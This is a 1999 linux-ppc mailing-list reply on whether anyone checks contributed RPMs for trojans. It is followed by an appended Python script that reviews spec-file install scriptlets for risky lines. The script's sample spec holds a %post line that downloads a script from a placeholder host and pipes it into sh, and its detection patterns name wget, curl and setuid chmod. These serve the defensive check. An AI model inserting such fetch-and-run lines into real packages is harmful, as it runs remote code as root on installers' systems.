
List:       linux-ppc
Subject:    Re: verifying /contrib (was gftp2.0.5a-1 in contrib is slightly
From:       "Andrew B. Arthur" <arthur99 () global2000 ! net>
Date:       1999-10-23 22:53:58


on 10/23/99 4:22 PM, R Shapiro at reshapiro@mediaone.net wrote:

>> Unfortunately, the manpower to examine each contrib'd rpm is simply not
>> there.

LinuxPPC Inc. certainly doesn't; it's up to the users (IMHO) to check this
area and make sure there are no problems with contributed RPMs. If there
are, your best bet is to post to linuxppc-user@lists.linuxppc.org,
ftp@linuxppc.org and of course the author.

As a rule, any contributed RPM should also have a matching SRPM -- as a
security measure, since with an SRPM you can easily check the source code (if
available) and the spec file. In theory, since the public can check these,
and since almost every contributed file is regularly downloaded, it should be
obvious which files do not belong up there.

>> But even then, there's no way LinuxPPC Inc could individually check each and
>> every binary for trojans.
>> 
That's totally impractical. As a user downloading from /contrib you should
be responsible for making sure the binary is safe to install on your system,
and that it won't hurt others that later download files.

> The security issue was a passing comment, I don't want to get hung up on that
> (though I have the unpleasant feeling we will anyway, since everybody likes to
> talk about security :-).
> 
There are always risks in getting items in binary or source code form
from an unofficial source. In the words of BitchX.org: "Downloading
Source or Binary Files from any site, but this official site, may lead you
to install a backdoored or insecure version that could destroy data".

> I was more interested in knowing whether anyone was checking whether the
> contributed rpms actually installed, and that the code thus installed actually
> ran. 

Again, this should be up to the contributors and the people that download it
and try it out.

>> The good news is that none of the binaries uploaded to contrib make their way
>> into the main distribution.

Of course, that's not to say that some of the ones, even done by "experienced"
packagers, don't have their issues. For example, broken WindowMaker RPMs
shipped with every PowerPC Linux distro, and some of the KDE 1.1.1 RPMs also
had issues.


Thanks,

Andrew Arthur a.k.a. AArthur
arthur99@global2000.net
AIM: arthur998


** Sent via the linuxppc-user mail list. See http://lists.linuxppc.org/
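One concrete way to do the spec-file check Andrew describes above, added here as an example and not code from the original thread or from LinuxPPC: a small Python script that parses a spec file, lists the Source/Patch inputs that carry no upstream URL (they exist only inside the SRPM, so there is nothing to compare them against and they have to be read by hand), and flags lines in the install-time scriptlets (%pre, %post, %preun, %postun, which rpm runs as root on the installing machine) that fetch from the network, pipe data into an interpreter, or set a setuid bit. The sample spec, package name and URLs are constructed for illustration, and the pattern list is a starting point for a review, not a complete test.

```python
import re
from collections import OrderedDict

# Section headers that start a scriptlet or body section in a spec file.
SECTION_HEADERS = ("%description", "%prep", "%build", "%install", "%clean",
                   "%pre", "%post", "%preun", "%postun", "%files", "%changelog")
# Scriptlets that rpm runs as root on the installing machine (not at build time).
INSTALL_TIME = ("%pre", "%post", "%preun", "%postun")

# Constructed sample spec (not from any real package); the %post section
# deliberately contains a network fetch piped into a shell so the review flags it.
SAMPLE_SPEC = """\
Summary: Example package, constructed for illustration
Name: example
Version: 1.0
Release: 1
Source0: http://example.invalid/example-1.0.tar.gz
Source1: example.init
Patch0: example-1.0-paths.patch

%description
Constructed example.

%prep
%setup -q
%patch0 -p1

%build
make

%install
make install DESTDIR=$RPM_BUILD_ROOT

%post
/sbin/ldconfig
wget -q -O - http://example.invalid/extra.sh | sh

%files
/usr/bin/example
"""

TAG_RE = re.compile(r"^([A-Za-z]+[0-9]*)\s*:\s*(.+?)\s*$")

def parse_spec(text):
    """Split a spec into preamble tags and named sections.

    Returns (tags, sections): tags maps e.g. 'Source0' -> value,
    sections maps e.g. '%post' -> list of non-blank lines in that section.
    """
    tags = OrderedDict()
    sections = OrderedDict()
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        word = line.split()[0]
        if word in SECTION_HEADERS:          # %setup/%patch0 are not headers
            current = word
            sections.setdefault(current, [])
            continue
        if current is None:                  # still in the preamble
            m = TAG_RE.match(line)
            if m:
                tags[m.group(1)] = m.group(2)
        else:
            sections[current].append(line)
    return tags, sections

def local_inputs(tags):
    """SourceN/PatchN entries with no URL: they live only inside the SRPM,
    so there is no upstream copy to compare against; read them by hand."""
    return [name for name, value in tags.items()
            if re.match(r"^(Source|Patch)[0-9]*$", name)
            and not re.match(r"^[a-z]+://", value)]

# Patterns in install-time scriptlets that deserve a closer look.
SUSPICIOUS = (
    (re.compile(r"\b(wget|curl|ftp|lynx)\b"), "fetches from the network at install time"),
    (re.compile(r"\|\s*(sh|bash|perl|python)\b"), "pipes data into an interpreter"),
    (re.compile(r"\bchmod\s+[0-9]*[42][0-9]{3}\b|\bchmod\s+\S*\+s\b"), "sets a setuid/setgid bit"),
)

def review_scriptlets(sections):
    """Return (section, line, reason) for each suspicious install-time line."""
    findings = []
    for name in INSTALL_TIME:
        for line in sections.get(name, []):
            for pattern, reason in SUSPICIOUS:
                if pattern.search(line):
                    findings.append((name, line, reason))
    return findings

if __name__ == "__main__":
    tags, sections = parse_spec(SAMPLE_SPEC)
    print("package:", tags.get("Name"), tags.get("Version"))
    print("inputs to read by hand:", local_inputs(tags))
    for section, line, reason in review_scriptlets(sections):
        print(f"{section}: {reason}: {line}")
```

Run against a real SRPM, the spec comes out of `rpm2cpio foo.src.rpm | cpio -i` along with the Source and Patch files; the script only points at the lines worth reading, and the %build/%install sections still need a look since they decide what ends up in the binary RPM.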
